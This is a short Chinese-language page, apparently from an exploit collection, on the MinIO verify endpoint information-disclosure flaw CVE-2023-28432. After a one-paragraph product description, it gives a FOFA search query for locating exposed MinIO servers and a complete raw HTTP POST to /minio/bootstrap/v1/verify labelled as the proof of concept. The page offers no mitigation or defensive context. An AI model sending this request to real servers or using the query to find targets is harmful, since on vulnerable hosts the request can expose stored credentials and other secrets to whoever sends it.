跳到主要内容

MinIOverify接口敏感信息泄露漏洞（CVE-2023-28432）

MinIO verify 接口敏感信息泄露漏洞（CVE-2023-28432）

MinIO 是一种开源的对象存储服务，它兼容 Amazon S3 API，可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统，它可以存储大量数据，并提供对数据的高速读写能力。MinIO 采用分布式架构，可以在多个节点上运行，从而实现数据的分布式存储和处理。

fofa

title="MinIO Browser" || banner="MinIO" || header="MinIO"

poc

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Upgrade-Insecure-Requests: 1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

MinIO verify 接口敏感信息泄露漏洞（CVE-2023-28432）
fofa
poc